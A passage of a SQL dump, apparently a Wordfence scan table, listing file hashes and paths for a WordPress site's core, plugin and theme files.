,'','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b37485236dc8f1110202b24f11eec6f462b766e6','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/tools/options-group-2fa.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b3765494180a8b8c0e0c2fec2d0fbfb8fef623da','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/scanner/issue-suspiciousAdminUsers.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b3785bd1f763238609a4d697e4b4c5f23bf9b539','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/OutOfQueriesException.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b37ad701fec2b29ed5ba215835e94952ca226eb5','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-wp-footer-content.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b3808c20c4e109d0b1c8fad57c731aa7c989f0f6','/home/westonspirit.org.uk/public_html/wp-admin/admin-post.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b38125d1c89c60a69ae21b2253b0ace521dfd961','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/scanner/issue-database.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b3a01db9486524ef07c02de8e1462923551216bd','/home/westonspirit.org.uk/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b3b1992f059fd6fb4f0cbd07f5bb0ba15c8c6289','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/editor-templates/panel.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b3bd2259dd2e9fb3525140d2c19d833460210d48','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/views/.htaccess',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b3c0bd49d1a36b26f1af3d802d546b2ef8a8fdeb','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-recovery-mode-email-service.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b3ce160553f848910a56c26dc841a97f43dd6c74','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/app/modules/kit-library/data/kits/endpoints/index.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b41e396a63c31a3683084abb1818eeb0da3383eb','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/composer/autoload_psr4.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b4245a7de5ff3a7801e742aedf901086b394d0bd','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-wp-upgrader-skins.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b4278d26933da1f49905d74305d02510f0d0e36a','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/fileio/rss.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b4ba9146c4a0562491bfb13eb9c7ce06cf30716d','/home/westonspirit.org.uk/public_html/wp-admin/user/privacy.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b4bc0b8882a53915df45cc2d8a4504ab7ecbc06c','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b55c291f1ce166dbe26bf2ef437d13124ece79ab','/home/westonspirit.org.uk/public_html/wp-includes/wp-diff.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b5628f655e3be445515ade0fa82bc0f607bac29e','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/classes/model/tokenbucket.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b572026dd65ae007c0b0acf9540fbcb2fc2c3f24','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/wfView.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b5779d1cd7e02b624bad89a4f5284285f5fe29cf','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/dashboard/widget_content_countries.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b58f73e86d5fa359b8b6b3f3b11b150198a7aab1','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-comment-query.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b5a6eb462275589d3ebd8aa5579b95f1af7e8d98','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/classes/model/settings/db.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b5ea9ff45c4d027f25930c917fbd4d8cf4a16470','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/redirection.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b6226d4061caedaaab9e7d8aba7307fc6d0c03ae','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/wp-security-core.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b6302284147e33948658451ed5d7d182d7d80561','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/modules/system-info/templates/html.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b670c9f6ba7e881973cf711b9e696d2c3d9a53f9','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/classes/model/text/html.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b6788f26e1a3ea1dd61537a6ef3b509110724c58','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/src/Core32/BLAKE2b.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b68db9e3bffbd982135b1f598ce5133e38b5c84c','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwentyone/template-parts/header/site-header.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b6bf0215214e93c48127141ecb9fc106d775dc92','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/app/modules/kit-library/data/base-controller.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b6e7ea5484037233203370e2edc28a7a6d1bfb71','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/XChaCha20.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b734d5b7694e83b51274e22b769619ad5f25df38','/home/westonspirit.org.uk/public_html/wp-includes/SimplePie/Locator.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b747264bc183af7e99063ae676bc89fe5caba412','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/preview.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b74a0dcf803229091e271e587e45a33df9e2c1eb','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/upgrade/updater.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b7588211cd325bd90e6ad4f18378055cf7d7b428','/home/westonspirit.org.uk/public_html/wp-admin/ms-delete-site.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b7b49ccd2f69dea7941fac0bed6f4371c39bebbb','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/models/log/log-redirect.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b7c265d0aa918afa79cb3970f282f6fa0aed61b5','/home/westonspirit.org.uk/public_html/wp-includes/theme-compat/embed-404.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b7c2e55774bae2a0998c559d7329a9bb0d5f5a4a','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/managers/icons.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b7d98733031620b9726fc5d75c6ab959d05048ca','/home/westonspirit.org.uk/public_html/wp-includes/random_compat/random_int.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b806bcf608c84579150ca2945a8c1143f43ac417','/home/westonspirit.org.uk/public_html/wp-admin/options-general.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b80d60742d91e34e59f2596526b64862bebb9a2e','/home/westonspirit.org.uk/public_html/wp-includes/SimplePie/IRI.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b835433a75565868de44184cea1aefb6b88486a3','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/controls/deprecated-notice.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b85e4ada4df3559895c72549b7709b2311823783','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/widgets/divider.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b875f3a67a0d7f29ad503fa7fa639c3cab0673e8','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HSalsa20.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b87bf38ef6be67fbe38f4fb01572fc93dcc38a83','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XChaCha20.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b87f46eebb789348b97340a9509b71a4395deca9','/home/westonspirit.org.uk/public_html/wp-content/plugins/disable-gutenberg/inc/plugin-core.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b898c7fb770bee01dedc9e49d9f78a6e0599c4a4','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b8c30737de4290de8656ee954b7bc905e58bb9f2','/home/westonspirit.org.uk/public_html/wp-admin/options-writing.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b93f55f98d37bd72b0c7af94692a9476d50b9d88','/home/westonspirit.org.uk/public_html/wp-includes/theme-compat/sidebar.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b95ff6a43e49d2b1e5743d7130ae08145a592292','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/scanner/issue-wfPluginAbandoned.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b9aa85e6a5c8b96d121a131d1577fe518a9e0a21','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/scanner/site-cleaning-beta-sigs.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b9d7303d270e820dde4863cd04e45181076f5837','/home/westonspirit.org.uk/public_html/wp-admin/includes/theme.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b9d8594478747c2412d6bd9a355982932d5f974e','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/database/schema/420.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b9d95a9615283e717293ae66aa427ea53a88b7b6','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/app/modules/kit-library/data/kits/endpoints/download-link.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b9f271277a325ae2c9eeb40381f274f638cce9d3','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/files/css/post-local-cache.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ba1ddf20a34773c2d7178f667c3794ae365086a7','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/blocking/blocking-status.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ba21e39095e92afd1183e0774861173041a05b5d','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-pclzip.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ba643333d5824c32e14a63f97b82650fead02dff','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/rest-api/wfRESTScanController.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ba684c49be1a7d2a39a7aaa54df8043965046dc3','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/controls/repeater.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'baac17729299cba0630891e633fad0c30dbf5def','/home/westonspirit.org.uk/public_html/wp-includes/SimplePie/Source.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'bb312b607553d689ba2dd20c0328551d7c178079','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/common/modules/finder/categories/create.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'bb3a40e231fcf03d312b0e1e397fa993ab1481a0','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwenty/template-parts/featured-image.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'bbb21ea9d16ca133f5250a930ad876ee80581740','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/src/Core32/Util.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'bbc67ff8188d828d0bf772e71c871a845f1b1625','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-wp-community-events.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'bbc92c1e2b9ae0bb7bcba80b54cde50601e776d9','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/lib/php72compat_const.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'bbe28697469dbf0a71624e9b712e583330e65254','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-404.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'bbee5e5bd32c6be026c6c10789a6375c7075f549','/home/westonspirit.org.uk/public_html/wp-content/themes/newsmagbd/template-parts/single/content.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'bc2328fd8632c3af0f6e9d27c827525dddeb6f57','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/email_newIssues.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'bc2912d3013eec7458743be76eba6c4d02f7a883','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-http-requests-hooks.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'bc2f7c47a3cff32d49a32effa5d63e78ce4c1776','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/waf/waf-install-success.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'bc43edd8f44f985eaf06a7505507744b2603ce41','/home/westonspirit.org.uk/public_html/wp-admin/includes/options.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'bc8548156e62804f0e458208b3e1642f7f99b1de','/home/westonspirit.org.uk/public_html/wp-admin/includes/privacy-tools.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'bd0d03b67fe580ea1a1b179389f9fb1c669eb960','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/composer/autoload_files.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'bd3b82dacb5fac5d7e25b4f68c05f76db362ec06','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'bd486aee1f75beac58972ff9b6076e89f41916b8','/home/westonspirit.org.uk/public_html/wp-includes/customize/class-wp-customize-selective-refresh.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'bd549533f1864b7d2fc586403d768040c85ec343','/home/westonspirit.org.uk/public_html/wp-admin/upgrade-functions.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'bd5bba8608a93a0276c70780347952d8ffb15160','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/scanner/issue-control-edit-comment.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'bd6c7a8712cdb6af7a4df5a4bc31d90ed42b9e41','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/autoload.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'bdd17f24dce08d84f2fa1a3c66569dbbd8b287b8','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/classes/model/ip.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'bdd3725cd05dcdbc1bb99086e348c560a8a1a0f3','/home/westonspirit.org.uk/public_html/wp-includes/functions.wp-scripts.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'bde3e6028528faf506c30f62f08f4315c9e32d44','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'bde52513a8b8c4e8c528cd40820a7714951e2fe3','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'be39e3d545fe64b531465b4567b8ba218cc6183d','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/user.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'be4aeea256b8c69698d629726772f09b75de721e','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-metadata-lazyloader.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'be6e88c2efad67c89ecc62c26ef2e1009b8d4cc4','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Xsalsa20.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'be798bde1276e35917a280ab0999e9e44c705e11','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/app/modules/import-export/directories/templates.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'be8c62c0e171205a0b43ebe498aa398e5dc74987','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/classes/controller/totp.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'be98808a66e5747c4d9998567b0c9a0e7a0dbecc','/home/westonspirit.org.uk/public_html/wp-includes/registration.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'bee732af4852814ebec85e6cb86e2866bd84d99a','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/breakpoints/manager.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'bf0cefcafe0f4fc48e73e0c7dc34867fb7be0b92','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/editor/data/globals/endpoints/typography.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'bf1b3786790c59821802ec15b1dd257d3c90d655','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/redirection-cli.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'bf414e00102b4ec5910d205f75ec2d7a580f902f','/home/westonspirit.org.uk/public_html/wp-content/themes/twentynineteen/functions.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'bf4265d1c21524b8f7af21947055e0ace692643b','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/menu_options.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'bf917f5ba886ff09611702477d443e1aef15583d','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/wfAPI.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'bfd870f191b2dc6cdd903fd02d8376b6bb1b845c','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/wfMD5BloomFilter.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c00e80c46ddb48dd23b625a46c86397c3de1a1d1','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/gdpr/disabled-overlay.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c02c08f88a2e65ac9674e962ca6d5bb7d8bee232','/home/westonspirit.org.uk/public_html/wp-admin/network/site-themes.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c036ef5b169efe75ffa2e4b01a0e7f1bf49016e2','/home/westonspirit.org.uk/public_html/wp-includes/Requests/Response/Headers.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c0419a4e4eff8de7c73dcbba78be70c379310abb','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-date-query.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c069a054bfa6ec863c445c13dcccfcc5efdadace','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c0b3f4952d7a95633e2c35bee09b197aebe9c947','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/options/option-toggled-boolean-switch.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c0b934bed3cdf43905eb09657597b86762450b89','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/modules/compatibility-tag/compatibility-tag-report.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c0c600ffee99834e44290c7ca62b8df4d8fbfebc','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c0eb7a7a3f52e0ff56224fef20059c535d955562','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/options/option-textarea.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c10edb0df4f699d16032dae92cf7b780b2778e11','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwenty/template-parts/modal-menu.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c1127eed6bcce3cc6b2f936b5b1d6ea3f7cee8d1','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-unlock-request.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c113c1bc42e5a206f7cc743a29c17c6bac1ef7ad','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-wp-comments-list-table.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c14d8303ea87c60de28120828a24cb5c3e619741','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-widget.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c1670304b09fd7691fa375c9e073679bc516f85c','/home/westonspirit.org.uk/public_html/wp-includes/Requests/Proxy/HTTP.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c16ba57bcf361dfb9f5b081dc22ec27297a8fceb','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-phpunit.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c1702547590fdeb038e9015fc6394526cd8b6372','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/controls/date-time.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c17a6442f61df20b1bc7ca42b97ba7a3b82d359a','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/managers/widgets.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c1cbe18148b6e74ea6c90f5f8b1aadd63aba87a6','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/wfBrowscapCache.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c1f0ba1c3ff1871ccd032386e366424be1a62e80','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwentyone/single.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c23995c0b3a29633ff50d17e9052bb165d348ade','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/database/database.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c23f40f15605e67156d10461c7fe94fd29fed266','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/debug/classes/htaccess.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c2542890a59d170e90feac03b0d8f0aa4f23006e','/home/westonspirit.org.uk/public_html/wp-includes/class-walker-category.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c270a00f686501efee5de6cc18569250a712bcca','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/kits/documents/tabs/settings-custom-css.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c2b690cc0b9ba0a558132657a10a5a3301cd8bf8','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HSalsa20.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c2bd0a910fb42337877a3958b302517241bee0b8','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto32.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c2c5273ba466248ece5e7367eb48072412d9ba3c','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/gdpr/banner.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c2c7b5cf7d004cce06330e51248b76472f4e1480','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/utils/http.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c2cfadb39349cfd721ca4cbe859bf63feda4aadb','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-feed-cache.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c3018a10bed17189930189e914910be048cda40d','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c32378c815867438c2c013090e21e2f4f7b75bc4','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/modules/compatibility-tag/compatibility-tag.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c35971370a0c88fdf99162c00114cc0b49409b46','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c3666d3fb299c7e9ed84764264135c9c5e3111fd','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwentyone/inc/block-styles.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c37628b6f9ab1ba09b39d22d0535f204157f54c5','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InvalidInputException.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c39496e5c481a2bf3acdf74e4015d7914c54b9b7','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/wfIssues.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c3b59cd1f5f6c0364486e8f2a984485f0257ee06','/home/westonspirit.org.uk/public_html/wp-admin/includes/edit-tag-messages.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c3b85191f2322564de2e62a8c44fee8b9df4fba1','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/src/Core/SecretStream/State.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c3caa7843ba01dc877b0e1d649e3aede17c2ba96','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/utils/import-export/parsers/wxr-parser.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c3cad16989264b3971e62e91f2454b8407d922a1','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/IpAddressNotFoundException.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c3e05063fd23170e51f6d94078f7098ba99e2a41','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/utils/exceptions.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c3eb1ca0be7b54eefeb16abcab35c9e2ef8b2f06','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwenty/inc/starter-content.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c42297bfcc02711e0e113af5dfab3cfca9dee5fd','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/views/options/option-switch.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c43016c84d8c1ad